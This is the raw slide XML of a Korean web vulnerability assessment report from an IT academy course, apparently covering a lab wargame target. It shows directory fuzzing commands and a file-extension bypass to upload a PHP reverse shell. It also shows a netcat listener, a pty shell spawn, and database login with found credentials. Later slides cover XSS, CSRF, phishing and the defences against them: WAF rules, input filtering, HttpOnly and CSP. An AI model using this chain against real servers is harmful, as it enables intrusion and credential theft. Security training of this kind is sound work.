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4" r:id="rId6"/>
    <p:sldId id="278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87" r:id="rId15"/>
    <p:sldId id="288" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="291" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="283" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="263" r:id="rId25"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Gmarket Sans Bold" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pretendard Bold" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0A04020102020204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ontserrat Bold" panose="020B0600000101010101" charset="0"/>
      <p:bold r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="S-Core Dream 4 Regular" panose="020B0503030302020204" pitchFamily="34" charset="-127"/>
      <p:regular r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="S-Core Dream 5 Medium" panose="020B0503030302020204" pitchFamily="34" charset="-127"/>
      <p:regular r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="S-Core Dream 7 ExtraBold" panose="020B0803030302020204" pitchFamily="34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9FD"/>
    <a:srgbClr val="7BDAED"/>
    <a:srgbClr val="44C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000" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="1014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A277-7A06-4BBB-B766-06565CE5A328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79341-7A6F-41EE-9AFC-188CAF391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8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UZZ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ileupload/upload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84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3.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원격접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1D2D3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="NotoSansKR"/>
              </a:rPr>
              <a:t>db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내용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원격 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>셸로 넘어간다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>("/bin/bash")'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>넘어 간 후 웹페이지부분을 탐색한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>cd /var/www/html/includes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉토리 안의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>db.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 확인해보면 데이터베이스의 아이디</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비밀번호를 알아낼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27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4.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데이터베이스에서 정보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 err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>wargame_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -p StrongPassword123!</a:t>
            </a:r>
          </a:p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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블을 탐색하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>워게임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 플래그를 확인</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>유저 정보도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8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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 테스트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525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사용자의 입력 키를 하나하나 공격자 서버로 전송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채팅창이나 로그인 창에서 타이핑하는 정보 수집 가능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관리자가 해당 페이지를 열었을 때 자동으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>호출</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>토큰 없거나 쿠키로 인증한다면 관리자 권한으로 실행 가능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업로드 기능이 허술하면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 자동 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>웹쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 삽입 가능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가짜 로그인 폼으로 유도해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>계정과 비밀번호 탈취</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정교하게 디자인하면 사용자가 진짜라고 착각함</a:t>
            </a:r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7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4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/httpd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>modsecurity.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>local_rules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WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>룰 작성을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>브루트포싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 차단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01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/httpd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>modsecurity.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>local_rules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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>룰 작성을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>브루트포싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 차단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82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7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76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1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16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18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altLang="ko-KR" dirty="0"/>
              <a:t>&lt;&gt;  “ ‘ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>특수문자 필터링</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>입력값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 검증은 채팅창에는 텍스트만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>허용하면되기때문에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 err="1"/>
              <a:t>테그허용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pPr marL="228600" indent="-228600" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 쿠키 접근 못 하게 만듦 → 탈취 불가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스크립트 실행을 제한하는 보안 헤더</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="l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8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2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점검 과정 순서로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>OWASP TOP 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기반으로 한 예상취약점 정리 후 진단대상 정보 수집</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>점검으로 진행되며 점검을 바탕으로 나온 결과로 취약점 상세분석 및 보고서로 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1" dirty="0"/>
              <a:t>취약한 접근 제어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암호화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en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>인젝션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SQL Injection, XSS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불안전한 설계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보안 설정 오류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서버 측 요청 위조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>(SSRF)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보안 로그 및 모니터링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소프트웨어 및 데이터 무결성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신원 확인 및 인증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/>
              <a:t>취약하거나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>오래된 구성요소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4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7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공격할 시스템에 숨겨진 페이지가 있는지 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>wfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -c -z file,/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/directory-list-lowercase-2.3-medium.txt --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 404 -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.5.160/.FUZZ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victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 숨겨진 페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉토리를 찾기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>브루트포싱을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 시도</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>숨겨진 </a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>있는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 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2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2.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페이지의 취약점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관리자 전용 업로드 페이지에 접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>같은 파일은 올라가고 바로가기를 누르면 올린 파일이 출력된다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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>php, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, 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확장자는 업로드가 불가능하게 되어 있음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(Reverse Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>같은 공격 방지용으로 보임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reverseshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일의 확장자를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 고쳐 업로드 시도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업로드가 성공</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>터미널에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 5555 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>리스닝을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시켜놓고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 리버스 셸 공격 시도</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>원격 제어에 성공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7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1-1.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디렉토리 탐색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/uploads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉토리에 직접 들어가보니 접근 제한됨</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:br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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>uploads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉토리 탐색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.5.160/.fileupload/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/directory-list-lowercase-2.3-medium.txt -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>php,php.bak,html,txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>firewall_final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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>192.168.5.166 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>아이피로만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접속이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>가능하다는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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3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8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1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4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6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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75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9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82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hyperlink" Target="https://github.com/jeonghyeon9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26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50.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png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5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3581400"/>
            <a:ext cx="330200" cy="160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3314700"/>
            <a:ext cx="5981700" cy="519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400" y="2692400"/>
            <a:ext cx="6159500" cy="363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333500"/>
            <a:ext cx="2819400" cy="347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108200"/>
            <a:ext cx="2755900" cy="259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8300" y="3937000"/>
            <a:ext cx="2946400" cy="276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4114800"/>
            <a:ext cx="2933700" cy="262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6700" y="7594600"/>
            <a:ext cx="21463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7500" y="2222500"/>
            <a:ext cx="2133600" cy="267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7100" y="6565900"/>
            <a:ext cx="431800" cy="161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7480300"/>
            <a:ext cx="457200" cy="157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2600" y="4038600"/>
            <a:ext cx="635000" cy="87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1300" y="6883400"/>
            <a:ext cx="457200" cy="1638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51887" y="2736850"/>
            <a:ext cx="7607300" cy="403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13200" b="0" i="0" u="none" strike="noStrike" spc="-2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>웹취약점  진단 보고서</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" sz="13200" b="0" i="0" u="none" strike="noStrike" spc="-2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="S-Core Dream 7 Extra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33000" y="237490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49509" y="6540500"/>
            <a:ext cx="689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900" b="0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KOREA IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1900" b="0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아카데미 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1900" b="1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대구 김정현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" spc="-100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0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A1BAFA-A64E-4FC9-9574-9F7D17E78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42" y="1304281"/>
            <a:ext cx="3864188" cy="31534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BB420A-D8FE-4F01-82CD-94D0A93BE2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4" y="4135252"/>
            <a:ext cx="8115300" cy="3609230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9499600" y="3845995"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70089"/>
              <a:gd name="adj2" fmla="val 5832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리버스쉘공격을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>리스닝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7805618-6039-43D9-BE1A-483516501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98" y="5327649"/>
            <a:ext cx="5915025" cy="4400550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2BDD740-A251-4EFC-A489-7DB1E7B5E3CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733798" y="7991901"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 86803"/>
              <a:gd name="adj2" fmla="val -4515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원격접속 성공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05BB-CEEB-48C5-A97A-35E9ADDE3F7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C9D7218-6690-4D69-A9B2-33F84B84ED73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2065336" y="794284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5505450" y="1141219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확장자 우회로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업로드</a:t>
            </a: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D8D43B10-D0DB-4553-9BCE-56B623EBE8C0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41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06839" y="-593048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58203" y="799464"/>
            <a:ext cx="3741493" cy="448728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="1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LFI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취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" spc="-5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30C499-57C7-427C-BD1C-0DB05258CD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5959377" cy="2171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356642-C113-4C51-B57C-B0E118A42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77" y="3334511"/>
            <a:ext cx="5943600" cy="4181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492F1F-7C27-4421-B741-DD5A47C574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04" y="5431599"/>
            <a:ext cx="8121441" cy="41814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7575550" y="917674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Uploads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉터리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>접근금지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7772400" y="32328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endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>디렉터리 탐색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2386012" y="7796439"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64302"/>
              <a:gd name="adj2" fmla="val -1968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5.166 IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>접속가능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64B4825C-F535-4BBB-81F0-D02F1683CE90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CA43E0-8058-462E-92FA-A881FC118840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
